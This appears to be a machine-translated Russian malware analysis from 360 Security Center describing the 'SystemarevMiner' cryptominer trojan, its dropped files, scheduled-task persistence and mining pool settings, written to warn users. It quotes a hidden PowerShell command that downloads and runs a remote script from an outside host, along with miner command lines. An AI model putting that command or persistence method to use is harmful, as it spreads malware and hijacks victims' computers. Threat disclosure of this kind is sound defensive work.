В последнее время 360 центр безопасности обнаружил тип троян-КриптоМайнер, который активно распространяется. Этот троян скрывает Вредоносный скрипт для майнинга на некоторых запланированных задачах, чтобы избежать обнаружения антивирусного программного обеспечения. Более того, даже если троян уже обнаружен и удален, троян все еще может быть воскрешен, пока файл скрипта существует. Мы назвали его «SystemarevMiner».
Анализ
Троян установлен на компьютере пользователя через плагин игры и программные трещины. Отпустите следующие файлы после загрузки установочного пакета:
c: \ program files \ systemarev \ revservicesx \ app_loader.exe
c: \ program files \ systemarev \ revservicesx \ systemupdate64x.exe
C: \ Program Files \ Common Files \ restore_rev.bat
Создайте несколько запланированных задач и элементов запуска:
Файл restore_rev.bat настраивается как скрытое свойство и добавляется в запланированные задачи. Пакетный файл будет использовать Powershell для загрузки нового скрипт троян Powershell:
powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command «»iex ((new-object net.webclient) .DownloadString (‘http://77.super-me.online/files/restore_rev_inj.ps1’))»
Restore_rev_inj.ps1 загружается как скрипт powershell. Содержание показано ниже:
Через скрипт, файлы, которые загружаются приложениями:
amd64.exe — это приложение для майнинга, использующее графическую карту OpenCL AMD для выполнения крипто-майнина.
Параметр майнинга: «-B -no-color -r 50 -o 85.25.74.57:2228 -u x -p x -variant -1 -k -nicehash»
cud8.exe — это инструмент для майнинга, использующий графическую карту nvidia для выполнения крипто-майнина.
Параметр майнинга: «-B -no-color -r 50 -o 85.25.74.57:2229 -u x -p x -variant 1 -k -nicehash»
64.exe — это XMR / XMV, который использует cpu для крипто-майнинга
Параметр майнинга: «-auto -any -forever -variation 3 -o xmr-us-east1.nanopool.org:14444 -u [HASH] .jce2 / x @ x.com -p x»
Мы можем видеть доход:
Другой наиболее прибыльный пул майнинга:
Общий доход от пула этой учетной записи:
MServicesX.exe — это установочный пакет для трояна, предназначенный для восстановления первых трех файлов установки. Даже если файлы удалены, он все равно может быть восткрещен.
Напоминание
В последние дни мы обнаружили, что многие трояны-КриптоМанеры активно распространяются. Мы настоятельно рекомендуем пользователям включать антивирусное программное обеспечение при установке новых приложений. Пользователям также рекомендуется запускать проверку на вирусы с помощью 360 Total Security, чтобы не стать жертвой КриптоМайнеров.